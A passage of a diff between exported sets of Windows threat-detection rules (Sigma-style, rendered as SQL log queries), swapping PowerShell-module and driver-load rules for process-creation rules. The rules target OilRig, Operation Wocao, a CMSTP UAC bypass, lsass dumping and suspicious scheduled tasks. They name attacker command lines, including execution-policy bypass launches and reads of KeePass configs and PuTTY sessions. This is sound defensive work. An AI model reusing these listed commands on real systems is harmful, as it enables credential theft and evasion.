"4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "status": "experimental", - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1115" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - 
"author": "Jonathan Cheong, oscd.community", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", + "attack.t1036.004", "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate 
clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.003" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' 
ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine 
LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Suspicious Get Local Groups Information", - "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "status": "test", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups 
can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "status": "experimental", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrator script" + "Admin activity (unclear what they do nowadays with finger.exe)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_local_group_reco.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads 
from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Legitimate admin scripts may use the same technique, it's better to exclude 
specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' 
ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects the 
load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": 
"295c9289-acee-4503-a571-8eacaef36b28", + "title": "HackTool - Impersonate Execution", + "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = 
'0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + 
"attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE 